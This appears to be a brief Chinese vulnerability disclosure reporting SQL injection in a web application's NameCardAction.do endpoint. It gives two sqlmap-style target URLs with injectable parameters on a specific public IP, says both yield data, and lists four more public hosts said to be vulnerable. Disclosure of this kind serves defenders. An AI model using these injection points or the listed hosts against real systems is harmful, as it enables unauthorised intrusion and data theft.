### 简要描述:
sql注入
### 详细说明:
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201409/151841096779ba849218d493a2e78e6b8c04ce5c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/151841096779ba849218d493a2e78e6b8c04ce5c.jpg)
验证方式:
注入1:-u "http://222.178.221.54:7001/defaultroot/NameCardAction.do?delId=1&action=delperson"
注入2: -u"http://222.178.221.54:7001/defaultroot/NameCardAction.do?record=1&action=listLoad"
都能跑出数据的。
同样存在漏洞的地址
http://119.254.81.197:7001
http://61.191.17.216:7001
http://219.136.247.248:7001
http://222.178.221.54:7001
暂无评论